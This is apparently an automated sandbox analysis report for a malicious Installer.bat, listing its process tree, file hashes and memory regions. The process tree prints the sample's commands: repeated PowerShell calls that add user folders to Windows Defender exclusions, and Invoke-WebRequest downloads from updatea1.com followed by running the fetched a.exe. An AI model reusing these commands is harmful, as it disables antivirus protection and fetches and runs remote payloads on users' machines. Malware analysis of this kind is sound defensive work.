Analysis

  • max time kernel
    41s
  • max time network
    45s
  • platform
    windows7_x64
  • resource
    win7-20220812-en
  • resource tags

    arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system
  • submitted
    04/10/2022, 12:43

General

  • Target

    Installer.bat

  • Size

    2KB

  • MD5

    150dd36ccecbfe34cc6d50bacaea899d

  • SHA1

    7860408e7ee76cf3a23289e0cdfdb8758a012f08

  • SHA256

    ebb2bb6413b8b86576c4a2c8ec645a0013d7bed49c16ed6c3cc5b284bfa15bc2

  • SHA512

    ae281a5a37a6ef9f331a43947d740e08e4c491f6f8cfabbd113a957425b14374bf1e8390a7c80a44c382141ff7d3c85e724020773e781eca32468bf1d063b529

Score
1/10

Malware Config

Signatures

  • Suspicious behavior: EnumeratesProcesses 14 IoCs
  • Suspicious use of AdjustPrivilegeToken 14 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\Installer.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:900
    • C:\Windows\system32\cacls.exe
      "C:\Windows\system32\cacls.exe" "C:\Windows\system32\config\system"
      2⤵
        PID:1920
      • C:\Windows\system32\cmd.exe
        cmd.exe /c powershell.exe -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:2008
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell.exe -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
          3⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1908
      • C:\Windows\system32\cmd.exe
        cmd.exe /c powershell.exe -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\'
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:944
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell.exe -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\'
          3⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:984
      • C:\Windows\system32\cmd.exe
        cmd.exe /c powershell.exe -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming*'
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:1868
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell.exe -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming*'
          3⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1692
      • C:\Windows\system32\cmd.exe
        cmd.exe /c powershell.exe -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\*'
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:1096
      • C:\Windows\system32\cmd.exe
        cmd.exe /c powershell.exe -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:1828
      • C:\Windows\system32\cmd.exe
        cmd.exe /c powershell.exe -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\'
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:1112
      • C:\Windows\system32\cmd.exe
        cmd.exe /c powershell.exe -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionProcess 'C:\Users\Admin\AppData\Roaming'
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:1876
      • C:\Windows\system32\cmd.exe
        cmd.exe /c powershell.exe -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionProcess 'C:\Users\Admin\AppData\Roaming\'
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:1892
      • C:\Windows\system32\cmd.exe
        cmd.exe /c powershell.exe -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionProcess 'C:\Users\Admin\AppData\Roaming*'
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:1588
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell.exe -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionProcess 'C:\Users\Admin\AppData\Roaming*'
          3⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1936
      • C:\Windows\system32\cmd.exe
        cmd.exe /c powershell.exe -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionProcess 'C:\Users\Admin\*'
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:1752
      • C:\Windows\system32\cmd.exe
        cmd.exe /c powershell.exe -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionProcess 'C:\Users\Admin'
        2⤵
          PID:1120
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell.exe -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionProcess 'C:\Users\Admin'
            3⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1528
        • C:\Windows\system32\cmd.exe
          cmd.exe /c powershell.exe -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionProcess 'C:\Users\Admin\'
          2⤵
            PID:1736
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell Invoke-WebRequest https://updatea1.com/sh1z01/index/e6a5614c379561c94004c531781ee1c5/?servername=msi -OutFile 105.bat
            2⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1200
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell Invoke-WebRequest https://updatea1.com/sh1z01/index/d2ef590c0310838490561a205469713d/?servername=msi -OutFile a.exe
            2⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:916
          • C:\Windows\system32\cmd.exe
            cmd /c a.exe
            2⤵
              PID:1480
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell.exe -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\*'
            1⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1140
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell.exe -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'
            1⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1196
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell.exe -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\'
            1⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1228
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell.exe -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionProcess 'C:\Users\Admin\AppData\Roaming'
            1⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1284
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell.exe -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionProcess 'C:\Users\Admin\AppData\Roaming\'
            1⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1980
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell.exe -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionProcess 'C:\Users\Admin\*'
            1⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1976
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell.exe -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionProcess 'C:\Users\Admin\'
            1⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:468

          Network

                MITRE ATT&CK Matrix

                Replay Monitor

                Loading Replay Monitor...

                Downloads

                • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

                  Filesize

                  7KB

                  MD5

                  d1ea1b20591d7910c1792077aa06e913

                  SHA1

                  ebb8f2296c3e736ec9b54c7147a5117577b70a1c

                  SHA256

                  ed11d025093b5e6a1c904117118bb74277a53eca1c549d7ce8f64354115c46bc

                  SHA512

                  6b64276522f109897960c7abe1e2ec83aece3ae9a5dc1fb3798b49e905bae90d21bbfe4aec951230d7b59901c42c364f2d6b03aab8a255ccf40cc8fd33c2b043

                • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

                  Filesize

                  7KB

                  MD5

                  d1ea1b20591d7910c1792077aa06e913

                  SHA1

                  ebb8f2296c3e736ec9b54c7147a5117577b70a1c

                  SHA256

                  ed11d025093b5e6a1c904117118bb74277a53eca1c549d7ce8f64354115c46bc

                  SHA512

                  6b64276522f109897960c7abe1e2ec83aece3ae9a5dc1fb3798b49e905bae90d21bbfe4aec951230d7b59901c42c364f2d6b03aab8a255ccf40cc8fd33c2b043

                • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

                  Filesize

                  7KB

                  MD5

                  d1ea1b20591d7910c1792077aa06e913

                  SHA1

                  ebb8f2296c3e736ec9b54c7147a5117577b70a1c

                  SHA256

                  ed11d025093b5e6a1c904117118bb74277a53eca1c549d7ce8f64354115c46bc

                  SHA512

                  6b64276522f109897960c7abe1e2ec83aece3ae9a5dc1fb3798b49e905bae90d21bbfe4aec951230d7b59901c42c364f2d6b03aab8a255ccf40cc8fd33c2b043

                • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

                  Filesize

                  7KB

                  MD5

                  d1ea1b20591d7910c1792077aa06e913

                  SHA1

                  ebb8f2296c3e736ec9b54c7147a5117577b70a1c

                  SHA256

                  ed11d025093b5e6a1c904117118bb74277a53eca1c549d7ce8f64354115c46bc

                  SHA512

                  6b64276522f109897960c7abe1e2ec83aece3ae9a5dc1fb3798b49e905bae90d21bbfe4aec951230d7b59901c42c364f2d6b03aab8a255ccf40cc8fd33c2b043

                • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

                  Filesize

                  7KB

                  MD5

                  d1ea1b20591d7910c1792077aa06e913

                  SHA1

                  ebb8f2296c3e736ec9b54c7147a5117577b70a1c

                  SHA256

                  ed11d025093b5e6a1c904117118bb74277a53eca1c549d7ce8f64354115c46bc

                  SHA512

                  6b64276522f109897960c7abe1e2ec83aece3ae9a5dc1fb3798b49e905bae90d21bbfe4aec951230d7b59901c42c364f2d6b03aab8a255ccf40cc8fd33c2b043

                • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

                  Filesize

                  7KB

                  MD5

                  d1ea1b20591d7910c1792077aa06e913

                  SHA1

                  ebb8f2296c3e736ec9b54c7147a5117577b70a1c

                  SHA256

                  ed11d025093b5e6a1c904117118bb74277a53eca1c549d7ce8f64354115c46bc

                  SHA512

                  6b64276522f109897960c7abe1e2ec83aece3ae9a5dc1fb3798b49e905bae90d21bbfe4aec951230d7b59901c42c364f2d6b03aab8a255ccf40cc8fd33c2b043

                • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

                  Filesize

                  7KB

                  MD5

                  d1ea1b20591d7910c1792077aa06e913

                  SHA1

                  ebb8f2296c3e736ec9b54c7147a5117577b70a1c

                  SHA256

                  ed11d025093b5e6a1c904117118bb74277a53eca1c549d7ce8f64354115c46bc

                  SHA512

                  6b64276522f109897960c7abe1e2ec83aece3ae9a5dc1fb3798b49e905bae90d21bbfe4aec951230d7b59901c42c364f2d6b03aab8a255ccf40cc8fd33c2b043

                • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

                  Filesize

                  7KB

                  MD5

                  d1ea1b20591d7910c1792077aa06e913

                  SHA1

                  ebb8f2296c3e736ec9b54c7147a5117577b70a1c

                  SHA256

                  ed11d025093b5e6a1c904117118bb74277a53eca1c549d7ce8f64354115c46bc

                  SHA512

                  6b64276522f109897960c7abe1e2ec83aece3ae9a5dc1fb3798b49e905bae90d21bbfe4aec951230d7b59901c42c364f2d6b03aab8a255ccf40cc8fd33c2b043

                • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

                  Filesize

                  7KB

                  MD5

                  d1ea1b20591d7910c1792077aa06e913

                  SHA1

                  ebb8f2296c3e736ec9b54c7147a5117577b70a1c

                  SHA256

                  ed11d025093b5e6a1c904117118bb74277a53eca1c549d7ce8f64354115c46bc

                  SHA512

                  6b64276522f109897960c7abe1e2ec83aece3ae9a5dc1fb3798b49e905bae90d21bbfe4aec951230d7b59901c42c364f2d6b03aab8a255ccf40cc8fd33c2b043

                • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

                  Filesize

                  7KB

                  MD5

                  d1ea1b20591d7910c1792077aa06e913

                  SHA1

                  ebb8f2296c3e736ec9b54c7147a5117577b70a1c

                  SHA256

                  ed11d025093b5e6a1c904117118bb74277a53eca1c549d7ce8f64354115c46bc

                  SHA512

                  6b64276522f109897960c7abe1e2ec83aece3ae9a5dc1fb3798b49e905bae90d21bbfe4aec951230d7b59901c42c364f2d6b03aab8a255ccf40cc8fd33c2b043

                • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

                  Filesize

                  7KB

                  MD5

                  d1ea1b20591d7910c1792077aa06e913

                  SHA1

                  ebb8f2296c3e736ec9b54c7147a5117577b70a1c

                  SHA256

                  ed11d025093b5e6a1c904117118bb74277a53eca1c549d7ce8f64354115c46bc

                  SHA512

                  6b64276522f109897960c7abe1e2ec83aece3ae9a5dc1fb3798b49e905bae90d21bbfe4aec951230d7b59901c42c364f2d6b03aab8a255ccf40cc8fd33c2b043

                • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

                  Filesize

                  7KB

                  MD5

                  d1ea1b20591d7910c1792077aa06e913

                  SHA1

                  ebb8f2296c3e736ec9b54c7147a5117577b70a1c

                  SHA256

                  ed11d025093b5e6a1c904117118bb74277a53eca1c549d7ce8f64354115c46bc

                  SHA512

                  6b64276522f109897960c7abe1e2ec83aece3ae9a5dc1fb3798b49e905bae90d21bbfe4aec951230d7b59901c42c364f2d6b03aab8a255ccf40cc8fd33c2b043

                • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

                  Filesize

                  7KB

                  MD5

                  d1ea1b20591d7910c1792077aa06e913

                  SHA1

                  ebb8f2296c3e736ec9b54c7147a5117577b70a1c

                  SHA256

                  ed11d025093b5e6a1c904117118bb74277a53eca1c549d7ce8f64354115c46bc

                  SHA512

                  6b64276522f109897960c7abe1e2ec83aece3ae9a5dc1fb3798b49e905bae90d21bbfe4aec951230d7b59901c42c364f2d6b03aab8a255ccf40cc8fd33c2b043

                • memory/468-155-0x000007FEF4330000-0x000007FEF4D53000-memory.dmp

                  Filesize

                  10.1MB

                • memory/468-157-0x00000000028D4000-0x00000000028D7000-memory.dmp

                  Filesize

                  12KB

                • memory/468-158-0x00000000028DB000-0x00000000028FA000-memory.dmp

                  Filesize

                  124KB

                • memory/468-156-0x000007FEF37D0000-0x000007FEF432D000-memory.dmp

                  Filesize

                  11.4MB

                • memory/916-170-0x000007FEF4330000-0x000007FEF4D53000-memory.dmp

                  Filesize

                  10.1MB

                • memory/916-171-0x000007FEF37D0000-0x000007FEF432D000-memory.dmp

                  Filesize

                  11.4MB

                • memory/984-69-0x00000000024B4000-0x00000000024B7000-memory.dmp

                  Filesize

                  12KB

                • memory/984-70-0x00000000024BB000-0x00000000024DA000-memory.dmp

                  Filesize

                  124KB

                • memory/984-68-0x000007FEF37D0000-0x000007FEF432D000-memory.dmp

                  Filesize

                  11.4MB

                • memory/984-67-0x000007FEF4330000-0x000007FEF4D53000-memory.dmp

                  Filesize

                  10.1MB

                • memory/1140-83-0x000007FEF4330000-0x000007FEF4D53000-memory.dmp

                  Filesize

                  10.1MB

                • memory/1140-85-0x0000000002654000-0x0000000002657000-memory.dmp

                  Filesize

                  12KB

                • memory/1140-84-0x000007FEF37D0000-0x000007FEF432D000-memory.dmp

                  Filesize

                  11.4MB

                • memory/1140-86-0x000000000265B000-0x000000000267A000-memory.dmp

                  Filesize

                  124KB

                • memory/1196-96-0x000000000292B000-0x000000000294A000-memory.dmp

                  Filesize

                  124KB

                • memory/1196-95-0x0000000002924000-0x0000000002927000-memory.dmp

                  Filesize

                  12KB

                • memory/1196-94-0x000000001B770000-0x000000001BA6F000-memory.dmp

                  Filesize

                  3.0MB

                • memory/1196-93-0x0000000002924000-0x0000000002927000-memory.dmp

                  Filesize

                  12KB

                • memory/1196-92-0x000007FEF2E30000-0x000007FEF398D000-memory.dmp

                  Filesize

                  11.4MB

                • memory/1196-91-0x000007FEF3990000-0x000007FEF43B3000-memory.dmp

                  Filesize

                  10.1MB

                • memory/1200-166-0x00000000025AB000-0x00000000025CA000-memory.dmp

                  Filesize

                  124KB

                • memory/1200-162-0x000007FEF3990000-0x000007FEF43B3000-memory.dmp

                  Filesize

                  10.1MB

                • memory/1200-164-0x00000000025A4000-0x00000000025A7000-memory.dmp

                  Filesize

                  12KB

                • memory/1200-165-0x00000000025AB000-0x00000000025CA000-memory.dmp

                  Filesize

                  124KB

                • memory/1200-163-0x000007FEF2E30000-0x000007FEF398D000-memory.dmp

                  Filesize

                  11.4MB

                • memory/1228-101-0x000007FEF4330000-0x000007FEF4D53000-memory.dmp

                  Filesize

                  10.1MB

                • memory/1228-103-0x00000000027A4000-0x00000000027A7000-memory.dmp

                  Filesize

                  12KB

                • memory/1228-104-0x00000000027AB000-0x00000000027CA000-memory.dmp

                  Filesize

                  124KB

                • memory/1228-102-0x000007FEF37D0000-0x000007FEF432D000-memory.dmp

                  Filesize

                  11.4MB

                • memory/1284-113-0x000000000271B000-0x000000000273A000-memory.dmp

                  Filesize

                  124KB

                • memory/1284-112-0x0000000002714000-0x0000000002717000-memory.dmp

                  Filesize

                  12KB

                • memory/1284-110-0x000007FEF2E30000-0x000007FEF398D000-memory.dmp

                  Filesize

                  11.4MB

                • memory/1284-109-0x000007FEF3990000-0x000007FEF43B3000-memory.dmp

                  Filesize

                  10.1MB

                • memory/1284-111-0x000000001B780000-0x000000001BA7F000-memory.dmp

                  Filesize

                  3.0MB

                • memory/1528-148-0x000000001B7D0000-0x000000001BACF000-memory.dmp

                  Filesize

                  3.0MB

                • memory/1528-147-0x0000000002684000-0x0000000002687000-memory.dmp

                  Filesize

                  12KB

                • memory/1528-146-0x000007FEF2E30000-0x000007FEF398D000-memory.dmp

                  Filesize

                  11.4MB

                • memory/1528-150-0x000000000268B000-0x00000000026AA000-memory.dmp

                  Filesize

                  124KB

                • memory/1528-145-0x000007FEF3990000-0x000007FEF43B3000-memory.dmp

                  Filesize

                  10.1MB

                • memory/1528-149-0x0000000002684000-0x0000000002687000-memory.dmp

                  Filesize

                  12KB

                • memory/1692-78-0x00000000028FB000-0x000000000291A000-memory.dmp

                  Filesize

                  124KB

                • memory/1692-75-0x000007FEF3990000-0x000007FEF43B3000-memory.dmp

                  Filesize

                  10.1MB

                • memory/1692-76-0x000007FEF2E30000-0x000007FEF398D000-memory.dmp

                  Filesize

                  11.4MB

                • memory/1692-77-0x00000000028F4000-0x00000000028F7000-memory.dmp

                  Filesize

                  12KB

                • memory/1908-61-0x0000000002444000-0x0000000002447000-memory.dmp

                  Filesize

                  12KB

                • memory/1908-58-0x000007FEF3990000-0x000007FEF43B3000-memory.dmp

                  Filesize

                  10.1MB

                • memory/1908-62-0x000000000244B000-0x000000000246A000-memory.dmp

                  Filesize

                  124KB

                • memory/1908-60-0x000000001B6E0000-0x000000001B9DF000-memory.dmp

                  Filesize

                  3.0MB

                • memory/1908-57-0x000007FEFBD81000-0x000007FEFBD83000-memory.dmp

                  Filesize

                  8KB

                • memory/1908-59-0x000007FEF2E30000-0x000007FEF398D000-memory.dmp

                  Filesize

                  11.4MB

                • memory/1936-129-0x000007FEF2E30000-0x000007FEF398D000-memory.dmp

                  Filesize

                  11.4MB

                • memory/1936-132-0x00000000025FB000-0x000000000261A000-memory.dmp

                  Filesize

                  124KB

                • memory/1936-130-0x000000001B700000-0x000000001B9FF000-memory.dmp

                  Filesize

                  3.0MB

                • memory/1936-128-0x000007FEF3990000-0x000007FEF43B3000-memory.dmp

                  Filesize

                  10.1MB

                • memory/1936-131-0x00000000025F4000-0x00000000025F7000-memory.dmp

                  Filesize

                  12KB

                • memory/1976-140-0x000000000232B000-0x000000000234A000-memory.dmp

                  Filesize

                  124KB

                • memory/1976-137-0x000007FEF4330000-0x000007FEF4D53000-memory.dmp

                  Filesize

                  10.1MB

                • memory/1976-138-0x000007FEF37D0000-0x000007FEF432D000-memory.dmp

                  Filesize

                  11.4MB

                • memory/1976-139-0x0000000002324000-0x0000000002327000-memory.dmp

                  Filesize

                  12KB

                • memory/1980-118-0x000007FEF4330000-0x000007FEF4D53000-memory.dmp

                  Filesize

                  10.1MB

                • memory/1980-119-0x000007FEF37D0000-0x000007FEF432D000-memory.dmp

                  Filesize

                  11.4MB

                • memory/1980-120-0x00000000028D4000-0x00000000028D7000-memory.dmp

                  Filesize

                  12KB

                • memory/1980-122-0x00000000028DB000-0x00000000028FA000-memory.dmp

                  Filesize

                  124KB

                • memory/1980-121-0x00000000028D4000-0x00000000028D7000-memory.dmp

                  Filesize

                  12KB